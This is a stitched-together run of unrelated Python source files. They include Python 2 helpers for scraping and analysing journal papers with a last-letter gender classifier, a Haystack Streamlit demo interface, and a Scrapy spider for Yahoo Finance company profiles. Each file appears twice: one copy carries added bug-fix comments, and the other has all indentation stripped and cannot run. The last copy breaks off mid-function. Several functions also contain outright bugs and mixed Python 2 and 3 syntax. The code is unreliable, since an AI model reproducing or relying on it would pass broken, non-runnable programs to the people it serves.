        :param pool_name: if given, restrict the result to that pool.
        """
        labels = set()
        for pool in self.pools.values():
            if not pool_name or (pool.name == pool_name):
                labels.update(pool.labels)
        # BUG FIX: the extracted source fused dataset floats onto this line
        # ("return labels | 0.667798 | 0.113924"), which would raise
        # TypeError at runtime; restored to the plain return.
        return labels
import os
import glob
from datetime import datetime,date
import random
import itertools
import pickle
import time
import requests
from bs4 import BeautifulSoup
import re
import nltk
from nltk.corpus import names
from nltk.tokenize import RegexpTokenizer
from sklearn.feature_extraction.stop_words import ENGLISH_STOP_WORDS
from wordcloud import WordCloud
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import seaborn as sns
from sklearn.model_selection import train_test_split
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.naive_bayes import MultinomialNB
from sklearn.ensemble import RandomForestClassifier
from sklearn import metrics
from IPython.display import display
def get_date(date_text):
    """Parse a labelled date string such as 'Received: 14 July 2019'.

    Returns a datetime for well-formed input; falls back to the sentinel
    date(1900, 7, 14) when fewer than three tokens follow the label.
    """
    tokens = date_text.split(':')[1][1:].split()
    if len(tokens) < 3:
        return date(1900, 7, 14)
    # Truncate the month name to three letters so '%b' matches it.
    stamp = '{0} {1} {2}'.format(tokens[0], tokens[1][:3], tokens[2])
    return datetime.strptime(stamp, '%d %b %Y')
def get_pubhistory(dates):
    """Build a (received, accepted, published) triple from date strings.

    Missing entries cascade: with no dates, a sentinel is used for all
    three; with one, all three coincide; with two, published equals
    accepted.
    """
    n = len(dates)
    if n == 0:
        received = accepted = published = date(1900, 7, 14)
    elif n == 1:
        received = accepted = published = get_date(dates[0])
    elif n == 2:
        received = get_date(dates[0])
        accepted = published = get_date(dates[1])
    else:
        received = get_date(dates[0])
        accepted = get_date(dates[1])
        published = get_date(dates[2])
    return received, accepted, published
def get_month(date):
    """Return the month number of an ISO-style 'yyyy-mm-dd' string."""
    parts = date.split('-')
    return int(parts[1])
def get_year(date):
    """Return the year number of an ISO-style 'yyyy-mm-dd' string."""
    return int(date.partition('-')[0])
def find_categories(html):
    """
    Find number of papers for each category in the html of a journal issue.

    Returns a list with one entry per paper, holding that paper's category
    name, so len(categories) equals the paper count.

    NOTE(review): Python 2 code — print statement, unicode(), str.decode()
    and integer division len(dois)/2 all assume py2.
    """
    # read html issue page and extract categories for each paper
    soup = BeautifulSoup(html, "html5lib")
    infos = soup.findAll('div', { "class" : "subject" })
    # remove parenthesis from categories to be able to do regex
    infos_reg = [str(info).replace('(','.*?') for info in infos]
    infos_reg = [info.replace(')','.*?') for info in infos_reg]
    #print infos
    categories=[]
    # NOTE(review): range(len(infos)-1) means the LAST category header is
    # never counted — confirm whether that is intentional.
    for iinfo in range(len(infos)-1):
        # Regex spanning from this category header to the next one.
        infostr = '(('+str(infos_reg[iinfo])+').*?('+str(infos_reg[iinfo+1])+'))'
        #print infostr
        dois = re.findall(unicode(infostr, "utf-8"), html, re.DOTALL)
        #print dois[0][0]
        # All '/doi/abs' links between the two headers; the /2 below
        # suggests each paper contributes two links — TODO confirm.
        dois = re.findall('"((/doi/abs).*?)"', dois[0][0])
        #print dois
        #category = re.findall(r'subject">(.*)</div>', str(infos[iinfo]))
        category = re.findall(r'subject">(.*)</div>', str(infos[iinfo]))[0].decode("utf-8")
        print '%s: %d' %(category, len(dois)/2)
        categories.extend([category]*(len(dois)/2))
    return categories
def words_from_text(texts):
    """Collect all lower-cased word tokens from *texts*, minus stopwords.

    The stopword set is the union of NLTK's and scikit-learn's English
    lists; input order of the surviving words is preserved.
    """
    lowered = [token.lower()
               for text in texts
               for token in re.findall(r'\w+', text)]
    # Combined English stopword list (NLTK + sklearn).
    stopwords = set(nltk.corpus.stopwords.words('english')) | set(ENGLISH_STOP_WORDS)
    return [word for word in lowered if word not in stopwords]
def extract_first_authors_name(author_list):
    """Return the first author's first name from 'Author1; Author2; ...'."""
    first_author = author_list.split(';')[0]
    return first_author.split(' ')[0]
def gender_features(word):
    """
    Feature extractor for the name classifier.

    The single feature is the name's final letter, keyed "last_letter".
    """
    return dict(last_letter=word[-1])
def gender_training(verb=False):
    """
    Train a naive-Bayes gender classifier on the NLTK names corpus.

    :param verb: if True, print accuracy on a 500-name hold-out set and
        show the most informative features.
    :return: the trained nltk.NaiveBayesClassifier.
    """
    # Extract the data sets
    labeled_names = ([(name, "male") for name in names.words("male.txt")] +
                     [(name, "female") for name in names.words("female.txt")])
    # Shuffle the names in the list
    random.shuffle(labeled_names)
    # Process the names through feature extractor
    feature_sets = [(gender_features(n), gender)
                    for (n, gender) in labeled_names]
    # Divide the feature sets into training and test sets
    train_set, test_set = feature_sets[500:], feature_sets[:500]
    # Train the naiveBayes classifier
    classifier = nltk.NaiveBayesClassifier.train(train_set)
    if verb:
        # Test the accuracy of the classifier on the test data
        print('Accuracy: %f ' % nltk.classify.accuracy(classifier, test_set))
        # NOTE(review): Python 2 print statement below.
        print classifier.show_most_informative_features(5)
    return classifier
def gender_classifier(name, classifier):
    """Apply *classifier* to the last-letter features of *name*."""
    features = gender_features(name)
    return classifier.classify(features)
def print_confusion_matrix(confusion_matrix, class_names, figsize=(10, 7), fontsize=14):
    """Plots a confusion matrix, as returned by sklearn.metrics.confusion_matrix, as a heatmap.

    Arguments
    ---------
    confusion_matrix: numpy.ndarray
        The numpy.ndarray object returned from a call to sklearn.metrics.confusion_matrix.
        Similarly constructed ndarrays can also be used.
    class_names: list
        An ordered list of class names, in the order they index the given confusion matrix.
    figsize: tuple
        A 2-long tuple, the first value determining the horizontal size of the outputted figure,
        the second determining the vertical size. Defaults to (10,7).
    fontsize: int
        Font size for axes labels. Defaults to 14.

    Returns
    -------
    matplotlib.figure.Figure
        The resulting confusion matrix figure
    """
    df_cm = pd.DataFrame(
        confusion_matrix, index=class_names, columns=class_names,
    )
    fig = plt.figure(figsize=figsize)
    try:
        # fmt="d" requires integer cell values.
        heatmap = sns.heatmap(df_cm, annot=True, fmt="d")
    except ValueError:
        raise ValueError("Confusion matrix values must be integers.")
    heatmap.yaxis.set_ticklabels(heatmap.yaxis.get_ticklabels(), rotation=0, ha='right', fontsize=fontsize)
    heatmap.xaxis.set_ticklabels(heatmap.xaxis.get_ticklabels(), rotation=45, ha='right', fontsize=fontsize)
    plt.ylabel('True label')
    plt.xlabel('Predicted label')
    # BUG FIX: the docstring promises the figure, but the original never
    # returned it.
    return fig
import os
import glob
from datetime import datetime,date
import random
import itertools
import pickle
import time
import requests
from bs4 import BeautifulSoup
import re
import nltk
from nltk.corpus import names
from nltk.tokenize import RegexpTokenizer
from sklearn.feature_extraction.stop_words import ENGLISH_STOP_WORDS
from wordcloud import WordCloud
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import seaborn as sns
from sklearn.model_selection import train_test_split
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.naive_bayes import MultinomialNB
from sklearn.ensemble import RandomForestClassifier
from sklearn import metrics
from IPython.display import display
def get_date(date_text):
"""
Extract date from text in format yyyy-mm-dd 00:00:00
"""
date_text = date_text.split(':')[1][1:].split()
#print date_text[0]+' '+date_text[1][:3]+' '+date_text[2]
if len(date_text)<3:
date_text = date(1900, 7, 14)
else:
date_text = datetime.strptime(date_text[0]+' '+date_text[1][:3]+' '+date_text[2], '%d %b %Y')
return date_text
def get_pubhistory(dates):
"""
Extract publication history from list of dates in text format yyyy-mm-dd 00:00:00
"""
# create publication history
if len(dates)==0:
received = date(1900, 7, 14)
accepted = published = received
elif len(dates)==1:
received = get_date(dates[0])
accepted = published = received
elif len(dates)==2:
received = get_date(dates[0])
accepted = get_date(dates[1])
published = accepted
else:
received = get_date(dates[0])
accepted = get_date(dates[1])
published = get_date(dates[2])
return received, accepted, published
def get_month(date):
"""
Extract month from date
"""
return int(date.split('-')[1])
def get_year(date):
"""
Extract year from date
"""
return int(date.split('-')[0])
def find_categories(html):
"""
Find number of papers for each category in the html of a journal issue
"""
# read html issue page and extract categories for each paper
soup = BeautifulSoup(html, "html5lib")
infos = soup.findAll('div', { "class" : "subject" })
# remove parenthesis from categories to be able to do regex
infos_reg = [str(info).replace('(','.*?') for info in infos]
infos_reg = [info.replace(')','.*?') for info in infos_reg]
#print infos
categories=[]
for iinfo in range(len(infos)-1):
infostr = '(('+str(infos_reg[iinfo])+').*?('+str(infos_reg[iinfo+1])+'))'
#print infostr
dois = re.findall(unicode(infostr, "utf-8"), html, re.DOTALL)
#print dois[0][0]
dois = re.findall('"((/doi/abs).*?)"', dois[0][0])
#print dois
#category = re.findall(r'subject">(.*)</div>', str(infos[iinfo]))
category = re.findall(r'subject">(.*)</div>', str(infos[iinfo]))[0].decode("utf-8")
print '%s: %d' %(category, len(dois)/2)
categories.extend([category]*(len(dois)/2))
return categories
def words_from_text(texts):
"""
Loop through list of strings and extract all words and remove common stopwords
"""
words = []
# extract words and make them lower case
for text in texts:
tokens = re.findall('\w+', text)
for word in tokens:
words.append(word.lower())
# get English stopwords and remove them from list of words
sw = nltk.corpus.stopwords.words('english')
# add sklearn stopwords to words_sw
sw = set(sw + list(ENGLISH_STOP_WORDS))
# add to words_ns all words that are in words but not in sw
words_ns = []
for word in words:
if word not in sw:
words_ns.append(word)
#print words_ns
return words_ns
def extract_first_authors_name(author_list):
"""
Extract first name from a string including list of authors in form Author1; Author2; ...; AuthorN
"""
return author_list.split(';')[0].split(' ')[0]
def gender_features(word):
"""
Feature extractor for the name classifier
The feature evaluated here is the last letter of a name
feature name - "last_letter"
"""
return {"last_letter": word[-1]} # feature set
def gender_training(verb=False):
"""
Gender training based on nltk.NaiveBayesClassifier
"""
# Extract the data sets
labeled_names = ([(name, "male") for name in names.words("male.txt")] +
[(name, "female") for name in names.words("female.txt")])
# Shuffle the names in the list
random.shuffle(labeled_names)
# Process the names through feature extractor
feature_sets = [(gender_features(n), gender)
for (n, gender) in labeled_names]
# Divide the feature sets into training and test sets
train_set, test_set = feature_sets[500:], feature_sets[:500]
# Train the naiveBayes classifier
classifier = nltk.NaiveBayesClassifier.train(train_set)
if verb:
# Test the accuracy of the classifier on the test data
print('Accuracy: %f ' % nltk.classify.accuracy(classifier, test_set))
print classifier.show_most_informative_features(5)
return classifier
def gender_classifier(name, classifier):
"""
Apply gender classifier to a name
"""
return classifier.classify(gender_features(name))
def print_confusion_matrix(confusion_matrix, class_names, figsize=(10, 7), fontsize=14):
    """Plots a confusion matrix, as returned by sklearn.metrics.confusion_matrix, as a heatmap.

    Arguments
    ---------
    confusion_matrix: numpy.ndarray
        The numpy.ndarray object returned from a call to sklearn.metrics.confusion_matrix.
        Similarly constructed ndarrays can also be used.
    class_names: list
        An ordered list of class names, in the order they index the given confusion matrix.
    figsize: tuple
        A 2-long tuple, the first value determining the horizontal size of the outputted figure,
        the second determining the vertical size. Defaults to (10,7).
    fontsize: int
        Font size for axes labels. Defaults to 14.

    Returns
    -------
    matplotlib.figure.Figure
        The resulting confusion matrix figure
    """
    df_cm = pd.DataFrame(
        confusion_matrix, index=class_names, columns=class_names,
    )
    fig = plt.figure(figsize=figsize)
    try:
        # fmt="d" requires integer cell values.
        heatmap = sns.heatmap(df_cm, annot=True, fmt="d")
    except ValueError:
        raise ValueError("Confusion matrix values must be integers.")
    heatmap.yaxis.set_ticklabels(heatmap.yaxis.get_ticklabels(), rotation=0, ha='right', fontsize=fontsize)
    heatmap.xaxis.set_ticklabels(heatmap.xaxis.get_ticklabels(), rotation=45, ha='right', fontsize=fontsize)
    plt.ylabel('True label')
    # BUG FIX: the extracted source fused dataset floats onto the last line
    # ("plt.xlabel(...) | 0.328099 | 0.154089"); restored, and the promised
    # figure is now returned.
    plt.xlabel('Predicted label')
    return fig
import os
import sys
import html
import logging
import pandas as pd
from json import JSONDecodeError
from pathlib import Path
import streamlit as st
from annotated_text import annotation
from markdown import markdown
from htbuilder import H
# streamlit does not support any states out of the box. On every button click, streamlit reload the whole page
# and every value gets lost. To keep track of our feedback state we use the official streamlit gist mentioned
# here https://gist.github.com/tvst/036da038ab3e999a64497f42de966a92
import SessionState
from utils import HS_VERSION, feedback_doc, haystack_is_ready, retrieve_doc, upload_doc, haystack_version
# Adjust to a question that you would like users to see in the search bar when they load the UI:
DEFAULT_QUESTION_AT_STARTUP = "Who's the father of <NAME>?"
# Labels for the evaluation
EVAL_LABELS = os.getenv("EVAL_FILE", Path(__file__).parent / "eval_labels_example.csv")
# Whether the file upload should be enabled or not
DISABLE_FILE_UPLOAD = os.getenv("HAYSTACK_UI_DISABLE_FILE_UPLOAD")
def main():
    """Render the Haystack demo Streamlit page and drive query/feedback
    round-trips against the Haystack REST API."""
    # Persistent state
    state = SessionState.get(
        random_question=DEFAULT_QUESTION_AT_STARTUP,
        random_answer="",
        results=None,
        raw_json=None,
        get_next_question=True
    )

    # Small callback to reset the interface in case the text of the question changes
    def reset_results(*args):
        state.results = None
        state.raw_json = None

    # Title
    st.write("# Haystack Demo")

    # Sidebar
    st.sidebar.header("Options")
    top_k_reader = st.sidebar.slider("Max. number of answers", min_value=1, max_value=10, value=3, step=1)
    top_k_retriever = st.sidebar.slider("Max. number of documents from retriever", min_value=1, max_value=10, value=3, step=1)
    eval_mode = st.sidebar.checkbox("Evaluation mode")
    debug = st.sidebar.checkbox("Show debug info")

    # File upload block
    if not DISABLE_FILE_UPLOAD:
        st.sidebar.write("## File Upload:")
        data_files = st.sidebar.file_uploader("", type=["pdf", "txt", "docx"], accept_multiple_files=True)
        for data_file in data_files:
            # Upload file
            if data_file:
                raw_json = upload_doc(data_file)
                st.sidebar.write(str(data_file.name) + " ✅ ")
                if debug:
                    st.subheader("REST API JSON response")
                    st.sidebar.write(raw_json)

    # Footer: the backend version is optional — omit it on any failure.
    hs_version = None
    try:
        hs_version = f" <small>(v{haystack_version()})</small>"
    except Exception:
        pass

    st.sidebar.markdown(f"""
    <style>
        a {{
            text-decoration: none;
        }}
        .haystack-footer {{
            text-align: center;
        }}
        .haystack-footer h4 {{
            margin: 0.1rem;
            padding:0;
        }}
        footer {{
            opacity: 0;
        }}
    </style>
    <div class="haystack-footer">
        <hr />
        <h4>Built with <a href="https://www.deepset.ai/haystack">Haystack</a>{hs_version}</h4>
        <p>Get it on <a href="https://github.com/deepset-ai/haystack/">GitHub</a> - Read the <a href="https://haystack.deepset.ai/overview/intro">Docs</a></p>
        <small>Data crawled from <a href="https://en.wikipedia.org/wiki/Category:Lists_of_countries_by_continent">Wikipedia</a> in November 2021.<br />See the <a href="https://creativecommons.org/licenses/by-sa/3.0/">License</a> (CC BY-SA 3.0).</small>
    </div>
    """, unsafe_allow_html=True)

    # Load csv into pandas dataframe
    if eval_mode:
        try:
            df = pd.read_csv(EVAL_LABELS, sep=";")
        except Exception:
            st.error(f"The eval file was not found. Please check the demo's [README](https://github.com/deepset-ai/haystack/tree/master/ui/README.md) for more information.")
            sys.exit(f"The eval file was not found under `{EVAL_LABELS}`. Please check the README (https://github.com/deepset-ai/haystack/tree/master/ui/README.md) for more information.")

        # Get next random question from the CSV
        state.get_next_question = st.button("Load new question")
        if state.get_next_question:
            reset_results()
            new_row = df.sample(1)
            while new_row["Question Text"].values[0] == state.random_question:  # Avoid picking the same question twice (the change is not visible on the UI)
                new_row = df.sample(1)
            state.random_question = new_row["Question Text"].values[0]
            state.random_answer = new_row["Answer"].values[0]

    # Search bar
    question = st.text_input(
        "Please provide your query:",
        value=state.random_question,
        max_chars=100,
        on_change=reset_results
    )

    run_query = st.button("Run")

    # Check the connection
    with st.spinner("⌛️ Haystack is starting..."):
        if not haystack_is_ready():
            st.error("🚫 Connection Error. Is Haystack running?")
            run_query = False
            reset_results()

    # Get results for query
    if run_query and question:
        reset_results()
        with st.spinner(
            "🧠 Performing neural search on documents... \n "
            "Do you want to optimize speed or accuracy? \n"
            "Check out the docs: https://haystack.deepset.ai/usage/optimization "
        ):
            try:
                state.results, state.raw_json = retrieve_doc(question, top_k_reader=top_k_reader, top_k_retriever=top_k_retriever)
            except JSONDecodeError as je:
                st.error("👓 An error occurred reading the results. Is the document store working?")
                return
            except Exception as e:
                logging.exception(e)
                if "The server is busy processing requests" in str(e):
                    st.error("🧑‍🌾 All our workers are busy! Try again later.")
                else:
                    st.error("🐞 An error occurred during the request. Check the logs in the console to know more.")
                return

    if state.results:
        # Show the gold answer if we use a question of the given set
        if question == state.random_question and eval_mode:
            st.write("## Correct answers:")
            st.write(state.random_answer)

        st.write("## Results:")
        count = 0  # Make every button key unique

        for result in state.results:
            if result["answer"]:
                answer, context = result["answer"], result["context"]
                start_idx = context.find(answer)
                end_idx = start_idx + len(answer)
                # Hack due to this bug: https://github.com/streamlit/streamlit/issues/3190
                st.write(markdown(context[:start_idx] + str(annotation(answer, "ANSWER", "#8ef")) + context[end_idx:]), unsafe_allow_html=True)
                st.write("**Relevance:** ", result["relevance"], "**Source:** ", result["source"])
            else:
                st.warning("🤔 Haystack found no good answer to your question. Try to formulate it differently!")
                st.write("**Relevance:** ", result["relevance"])

            if eval_mode:
                # Define columns for buttons
                button_col1, button_col2, button_col3, _ = st.columns([1, 1, 1, 6])
                if button_col1.button("👍", key=f"{result['context']}{count}1", help="Correct answer"):
                    feedback_doc(
                        question=question,
                        is_correct_answer="true",
                        document_id=result.get("document_id", None),
                        model_id=1,
                        is_correct_document="true",
                        answer=result["answer"],
                        offset_start_in_doc=result.get("offset_start_in_doc", None)
                    )
                    st.success("✨ Thanks for your feedback! ✨")
                if button_col2.button("👎", key=f"{result['context']}{count}2", help="Wrong answer and wrong passage"):
                    feedback_doc(
                        question=question,
                        is_correct_answer="false",
                        document_id=result.get("document_id", None),
                        model_id=1,
                        is_correct_document="false",
                        answer=result["answer"],
                        offset_start_in_doc=result.get("offset_start_in_doc", None)
                    )
                    st.success("✨ Thanks for your feedback! ✨")
                if button_col3.button("👎👍", key=f"{result['context']}{count}3", help="Wrong answer, but correct passage"):
                    feedback_doc(
                        question=question,
                        is_correct_answer="false",
                        document_id=result.get("document_id", None),
                        model_id=1,
                        is_correct_document="true",
                        answer=result["answer"],
                        offset_start_in_doc=result.get("offset_start_in_doc", None)
                    )
                    st.success("✨ Thanks for your feedback! ✨")
            count += 1
            st.write("___")

        if debug:
            st.subheader("REST API JSON response")
            st.write(state.raw_json)
# BUG FIX: this line was fused with extraction junk ("main() | ui/webapp.py
# | import os"), a SyntaxError. Restored, and guarded so importing this
# module doesn't launch the UI.
if __name__ == "__main__":
    main()
import sys
import html
import logging
import pandas as pd
from json import JSONDecodeError
from pathlib import Path
import streamlit as st
from annotated_text import annotation
from markdown import markdown
from htbuilder import H
# streamlit does not support any states out of the box. On every button click, streamlit reload the whole page
# and every value gets lost. To keep track of our feedback state we use the official streamlit gist mentioned
# here https://gist.github.com/tvst/036da038ab3e999a64497f42de966a92
import SessionState
from utils import HS_VERSION, feedback_doc, haystack_is_ready, retrieve_doc, upload_doc, haystack_version
# Adjust to a question that you would like users to see in the search bar when they load the UI:
DEFAULT_QUESTION_AT_STARTUP = "Who's the father of <NAME>?"
# Labels for the evaluation
EVAL_LABELS = os.getenv("EVAL_FILE", Path(__file__).parent / "eval_labels_example.csv")
# Whether the file upload should be enabled or not
DISABLE_FILE_UPLOAD = os.getenv("HAYSTACK_UI_DISABLE_FILE_UPLOAD")
def main():
# Persistent state
state = SessionState.get(
random_question=DEFAULT_QUESTION_AT_STARTUP,
random_answer="",
results=None,
raw_json=None,
get_next_question=True
)
# Small callback to reset the interface in case the text of the question changes
def reset_results(*args):
state.results = None
state.raw_json = None
# Title
st.write("# Haystack Demo")
# Sidebar
st.sidebar.header("Options")
top_k_reader = st.sidebar.slider("Max. number of answers", min_value=1, max_value=10, value=3, step=1)
top_k_retriever = st.sidebar.slider("Max. number of documents from retriever", min_value=1, max_value=10, value=3, step=1)
eval_mode = st.sidebar.checkbox("Evaluation mode")
debug = st.sidebar.checkbox("Show debug info")
# File upload block
if not DISABLE_FILE_UPLOAD:
st.sidebar.write("## File Upload:")
data_files = st.sidebar.file_uploader("", type=["pdf", "txt", "docx"], accept_multiple_files=True)
for data_file in data_files:
# Upload file
if data_file:
raw_json = upload_doc(data_file)
st.sidebar.write(str(data_file.name) + " ✅ ")
if debug:
st.subheader("REST API JSON response")
st.sidebar.write(raw_json)
hs_version = None
try:
hs_version = f" <small>(v{haystack_version()})</small>"
except Exception:
pass
st.sidebar.markdown(f"""
<style>
a {{
text-decoration: none;
}}
.haystack-footer {{
text-align: center;
}}
.haystack-footer h4 {{
margin: 0.1rem;
padding:0;
}}
footer {{
opacity: 0;
}}
</style>
<div class="haystack-footer">
<hr />
<h4>Built with <a href="https://www.deepset.ai/haystack">Haystack</a>{hs_version}</h4>
<p>Get it on <a href="https://github.com/deepset-ai/haystack/">GitHub</a> - Read the <a href="https://haystack.deepset.ai/overview/intro">Docs</a></p>
<small>Data crawled from <a href="https://en.wikipedia.org/wiki/Category:Lists_of_countries_by_continent">Wikipedia</a> in November 2021.<br />See the <a href="https://creativecommons.org/licenses/by-sa/3.0/">License</a> (CC BY-SA 3.0).</small>
</div>
""", unsafe_allow_html=True)
# Load csv into pandas dataframe
if eval_mode:
try:
df = pd.read_csv(EVAL_LABELS, sep=";")
except Exception:
st.error(f"The eval file was not found. Please check the demo's [README](https://github.com/deepset-ai/haystack/tree/master/ui/README.md) for more information.")
sys.exit(f"The eval file was not found under `{EVAL_LABELS}`. Please check the README (https://github.com/deepset-ai/haystack/tree/master/ui/README.md) for more information.")
# Get next random question from the CSV
state.get_next_question = st.button("Load new question")
if state.get_next_question:
reset_results()
new_row = df.sample(1)
while new_row["Question Text"].values[0] == state.random_question: # Avoid picking the same question twice (the change is not visible on the UI)
new_row = df.sample(1)
state.random_question = new_row["Question Text"].values[0]
state.random_answer = new_row["Answer"].values[0]
# Search bar
question = st.text_input(
"Please provide your query:",
value=state.random_question,
max_chars=100,
on_change=reset_results
)
run_query = st.button("Run")
# Check the connection
with st.spinner("⌛️ Haystack is starting..."):
if not haystack_is_ready():
st.error("🚫 Connection Error. Is Haystack running?")
run_query = False
reset_results()
# Get results for query
if run_query and question:
reset_results()
with st.spinner(
"🧠 Performing neural search on documents... \n "
"Do you want to optimize speed or accuracy? \n"
"Check out the docs: https://haystack.deepset.ai/usage/optimization "
):
try:
state.results, state.raw_json = retrieve_doc(question, top_k_reader=top_k_reader, top_k_retriever=top_k_retriever)
except JSONDecodeError as je:
st.error("👓 An error occurred reading the results. Is the document store working?")
return
except Exception as e:
logging.exception(e)
if "The server is busy processing requests" in str(e):
st.error("🧑🌾 All our workers are busy! Try again later.")
else:
st.error("🐞 An error occurred during the request. Check the logs in the console to know more.")
return
if state.results:
# Show the gold answer if we use a question of the given set
if question == state.random_question and eval_mode:
st.write("## Correct answers:")
st.write(state.random_answer)
st.write("## Results:")
count = 0 # Make every button key unique
for result in state.results:
if result["answer"]:
answer, context = result["answer"], result["context"]
start_idx = context.find(answer)
end_idx = start_idx + len(answer)
# Hack due to this bug: https://github.com/streamlit/streamlit/issues/3190
st.write(markdown(context[:start_idx] + str(annotation(answer, "ANSWER", "#8ef")) + context[end_idx:]), unsafe_allow_html=True)
st.write("**Relevance:** ", result["relevance"], "**Source:** ", result["source"])
else:
st.warning("🤔 Haystack found no good answer to your question. Try to formulate it differently!")
st.write("**Relevance:** ", result["relevance"])
if eval_mode:
# Define columns for buttons
button_col1, button_col2, button_col3, _ = st.columns([1, 1, 1, 6])
if button_col1.button("👍", key=f"{result['context']}{count}1", help="Correct answer"):
feedback_doc(
question=question,
is_correct_answer="true",
document_id=result.get("document_id", None),
model_id=1,
is_correct_document="true",
answer=result["answer"],
offset_start_in_doc=result.get("offset_start_in_doc", None)
)
st.success("✨ Thanks for your feedback! ✨")
if button_col2.button("👎", key=f"{result['context']}{count}2", help="Wrong answer and wrong passage"):
feedback_doc(
question=question,
is_correct_answer="false",
document_id=result.get("document_id", None),
model_id=1,
is_correct_document="false",
answer=result["answer"],
offset_start_in_doc=result.get("offset_start_in_doc", None)
)
st.success("✨ Thanks for your feedback! ✨")
if button_col3.button("👎👍", key=f"{result['context']}{count}3", help="Wrong answer, but correct passage"):
feedback_doc(
question=question,
is_correct_answer="false",
document_id=result.get("document_id", None),
model_id=1,
is_correct_document="true",
answer=result["answer"],
offset_start_in_doc=result.get("offset_start_in_doc", None)
)
st.success("✨ Thanks for your feedback! ✨")
count += 1
st.write("___")
if debug:
st.subheader("REST API JSON response")
st.write(state.raw_json)
# BUG FIX: this line was fused with dataset floats ("main() | 0.396419 |
# 0.194731"), a runtime TypeError. Restored, and guarded so importing this
# module doesn't launch the UI.
if __name__ == "__main__":
    main()
from asyncio.log import logger
from ticker_scraper.items import CompanyItem
# Python
import json
import logging
# Scrapy
import scrapy
# --------------------------------------------------------------------------------------------------------------
class InfoSpider(scrapy.Spider):
'''
Spider in charge to extract the info of each company using the ticker symbol, extrating from
yahoo finance
'''
# Constants
COMPANY_NAME_XPATH = ''
BASE_URL = 'https://finance.yahoo.com/quote/{}/profile?p={}'
# Variables
name = 'info_spider'
custom_settings = {
'FEED_URI': 'company.json',
'FEED_FORMAT': 'json',
'FEED_ENCDING_FORMAT': 'urf-8',
'USER_AGENT': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.99 Safari/537.36'
}
def start_requests(self):
"""Method in charge to send to the parse method each url
Yields:
[Request]: send each request to scrapy engine
"""
# Gettings tickers
tickers = self.__get_tickers() # Hasta aquí OK
#self.log(print(tickers), logging.WARNNG)
# Cathces all the links creates in the method to start request
urls_tuple = self.__get_urls(tickers) #Hasta aquí OK
#self.log(print(urls_tuple), logging.WARNNG)
# sends to the scrapy engine each url to request them and send the response to the
# parse method
self.log(print(len(urls_tuple)), logging.WARNING)
for i in range(5):
#self.log(print(urls_tuple[i]), logging.WARNING)
yield scrapy.Request(urls_tuple[i], cb_kwargs={'ticker': tickers[i]})
def parse(self, response, **kwargs):
# Creating an CompanyItem from items.py
item = CompanyItem()
# Extracting info with xpath
item['name'] = response.xpath('//div[@data-test="qsp-profile"]/h3[@class="Fz(m) Mb(10px)"]/text()').get()
item['ticker'] = kwargs['ticker']
item['sector'] = response.xpath('//*[@id="Col1-0-Profile-Proxy"]/section/div[1]/div/div/p[2]/span[2]/text()').get()
item['industry'] = response.xpath('//*[@id="Col1-0-Profile-Proxy"]/section/div[1]/div/div/p[2]/span[4]/text()').get()
item['web_page'] = response.xpath('//*[@id="Col1-0-Profile-Proxy"]/section/div[1]/div/div/p[1]/a[2]/@href').get()
item['company_resume'] = response.xpath('//*[@id="Col1-0-Profile-Proxy"]/section/section[2]/p/text()').get()
yield item
def __get_tickers(self) -> tuple:
'''
Method that extracts the tickers from the final_ticker__symbols.json
Returns:
(tuple): a tuple of the tickers
'''
try:
with open("final_ticker_symbols.json", 'r+', encoding='utf-8') as file:
# Using loads because the "file" is a Json File
tickers = json.load(file)
# The data is a list, so we pass it to a tuple because it wont be modified just read
tickers = tuple(tickers)
return tickers
except OSError:
self.log(print("file not found"), logging.WARNING)
print('file not found')
def __get_urls(self, tickers: tuple) -> tuple:
    '''
    Build a Yahoo Finance profile URL for every ticker.

    Arguments:
        tickers (tuple): the ticker symbols.

    Returns:
        tuple: one formatted BASE_URL per ticker, in the same order.
    '''
    # BASE_URL needs the symbol twice: once in the path, once as ?p=.
    return tuple(self.BASE_URL.format(ticker, ticker) for ticker in tickers)
from ticker_scraper.items import CompanyItem
# Python
import json
import logging
# Scrapy
import scrapy
# --------------------------------------------------------------------------------------------------------------
class InfoSpider(scrapy.Spider):
    '''
    Spider that scrapes each company's profile from Yahoo Finance, one
    request per ticker symbol read from final_ticker_symbols.json.
    '''
    # Constants
    COMPANY_NAME_XPATH = ''
    BASE_URL = 'https://finance.yahoo.com/quote/{}/profile?p={}'
    # Variables
    name = 'info_spider'
    custom_settings = {
        'FEED_URI': 'company.json',
        'FEED_FORMAT': 'json',
        # Fixed: the key was misspelled 'FEED_ENCDING_FORMAT' with value
        # 'urf-8', so the encoding setting never took effect.
        'FEED_EXPORT_ENCODING': 'utf-8',
        'USER_AGENT': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.99 Safari/537.36'
    }

    def start_requests(self):
        """Yield one scrapy.Request per ticker (debug cap of 5 kept).

        Yields:
            scrapy.Request: profile-page request; the ticker symbol is
            forwarded to ``parse`` via ``cb_kwargs``.
        """
        # Guard against a failed load so zip/len below are safe.
        tickers = self.__get_tickers() or ()
        urls_tuple = self.__get_urls(tickers)
        # Log a real message; the original logged print(...)'s None.
        self.log('requesting %d urls' % len(urls_tuple), logging.WARNING)
        # Never index past the end (range(5) raised with <5 tickers).
        for url, ticker in list(zip(urls_tuple, tickers))[:5]:
            yield scrapy.Request(url, cb_kwargs={'ticker': ticker})

    def parse(self, response, **kwargs):
        """Extract the company profile fields into a CompanyItem."""
        item = CompanyItem()
        item['name'] = response.xpath('//div[@data-test="qsp-profile"]/h3[@class="Fz(m) Mb(10px)"]/text()').get()
        item['ticker'] = kwargs['ticker']
        item['sector'] = response.xpath('//*[@id="Col1-0-Profile-Proxy"]/section/div[1]/div/div/p[2]/span[2]/text()').get()
        item['industry'] = response.xpath('//*[@id="Col1-0-Profile-Proxy"]/section/div[1]/div/div/p[2]/span[4]/text()').get()
        item['web_page'] = response.xpath('//*[@id="Col1-0-Profile-Proxy"]/section/div[1]/div/div/p[1]/a[2]/@href').get()
        item['company_resume'] = response.xpath('//*[@id="Col1-0-Profile-Proxy"]/section/section[2]/p/text()').get()
        yield item

    def __get_tickers(self) -> tuple:
        '''Load the ticker symbols from final_ticker_symbols.json.

        Returns:
            tuple: the symbols, or an empty tuple when the file cannot
            be opened (the failure is logged, not raised).
        '''
        try:
